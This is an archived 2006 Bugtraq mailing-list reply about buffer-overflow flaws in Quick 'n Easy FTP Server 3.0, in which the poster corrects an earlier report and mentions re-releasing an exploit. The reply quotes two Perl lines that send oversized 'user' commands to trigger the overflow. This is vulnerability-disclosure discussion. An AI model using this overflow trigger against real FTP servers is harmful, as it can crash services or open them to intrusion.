lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060325121827.24081.qmail@securityfocus.com> Date: 25 Mar 2006 12:18:27 -0000 From: bifta04@....com To: bugtraq@...urityfocus.com Subject: Re: Quick 'n Easy FTP Server 3.0 pro / lite (buffer overflow vulnerabilities) You got it wrong the over-flow hapen's here print $socket "user " . "A" x 10240 . "\r\n"; print $socket "user " . "A" x 21048 . "\r\n"; and there are more i put this right and re released this exploit.